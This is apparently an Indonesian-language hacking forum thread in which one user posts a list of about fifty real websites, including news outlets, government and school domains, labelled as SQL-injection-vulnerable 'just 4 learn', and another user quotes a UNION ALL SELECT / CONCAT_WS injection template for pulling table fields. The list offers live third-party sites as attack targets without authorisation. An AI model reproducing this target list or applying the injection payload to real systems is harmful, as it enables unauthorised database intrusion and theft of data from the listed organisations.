tp gw lom cb uy..bnyk gawean..lanjutin aj bro ngopreknya..tar klo gw ad senggang gw coba jg

[nveuu]

bused... lengkappp!!!!!!!
tq suhu....

[bl00d13z]

update vulnerability SQLi link: just 4 learn

http://www.rleague.com/db/article.php?id=33012
http://www.gtk.fi/slr/article.php?id=18
http://www.as-coa.org/article.php?id=1571
http://www.edwardmiller.co.uk/gallery.php?id=15
http://www.roxanehopper.com/gallery.php?id=19&img=119
http://www.parkourgenerations.com/ga...hp?id=4&uid=25
http://apcdesigner.com/nigel8/gallery.php?id=61
http://www.wearisit.com/category.php?id=3
http://test.mhs.ox.ac.uk/libcat/title.php?id=1509581
http://www.seaofstories.com/title.php?id=4781
http://www.smdailyjournal.com/articl...w.php?id=66988
http://english.dvb.no/news.php?id=3498
http://en.apa.az/news.php?id=52032
http://burmese.dvb.no/news.php?id=7432
http://www.kvbpr.com/news.php?id=61
http://www.itjen.depkumham.go.id/new...aca&info_id=22
http://elink.dinkespurworejo.go.id/m...=viewcat&cid=2
http://www.siwakz.net/mod.php?mod=pu...icle&artid=275
http://www.lcki.org/english/mod.php?...=viewcat&cid=3
http://www.alvintoursindonesia.com/m...e&cid=&artid=8
http://www.globalcertificate.com/mod...rticle&artid=4
http://www.duniaflora.com/mod.php?mo...&cid=&artid=46
http://www.adcom.empi.in/mod.php?mod...rticle&artid=9
http://pojokantikorupsi.com/mod.php?...=12&artid=1354
http://www.batamiklan.com/mod.php?mo...cid=&artid=214
http://www.perpustakaan-islam.com/mo...icle&artid=181
http://info.balitacerdas.com/mod.php...ticle&artid=45
http://www.propertynbank.com/mod.php...icle&artid=198
http://www.mimbar-opini.com/mod.php?...cle&artid=3191
http://www.koinwnia.com/mod.php?mod=...d=16&artid=158
http://komiq.org/read/mod.php?mod=pu...ticle&artid=45
http://www.pedulisampah.org/mod.php?...rticle&artid=9
http://www.infoibu.com/mod.php?mod=p...ticle&artid=88
http://gbe.empi.in/mod.php?mod=publi...ticle&artid=22
http://www.agenpulsa.info/mod.php?mo...icle&artid=140
http://beritapendidikan.com/mod.php?...=12&artid=1354
http://www.adjogja.com/mod.php?mod=p...cid=5&artid=81
http://www.outlet-bisnis.com/mod.php...icle&artid=663
http://mitrawacanawrc.com/mod.php?mo...id=&artid=1500
http://www.perwatatower.com/mod.php?...ticle&artid=23
http://paroki-sragen.or.id/mod.php?m...id=11&artid=58
http://www.situsportal.com/mod.php?m...viewcat&cid=21
http://www.mediaborneo.com/mod.php?m...rticle&artid=2
http://trisnabalitours.com/mod.php?m...viewcat&cid=23
http://www.solusta.com/mod.php?mod=p...rticle&artid=6
http://www.ib-center.com/mod.php?mod...cid=20&artid=3
http://www.konteriklan.com/mod.php?m...ticle&artid=66
http://www.okebiz.com/mod.php?mod=pu...rticle&artid=8
http://www.smpn19jkt.sch.id/article....=news&idbef=74

[New_Dudutz]

wah rada kurang ngerti nih bro bl00d13z,

contohnya

Code:

UNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMIS AH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAM A_TABLE

itu buat apa ya, itu SQL code ? gw rada bingung nyari2 code nya buat ngehubungin 1 page ke page lain.........@_@ ......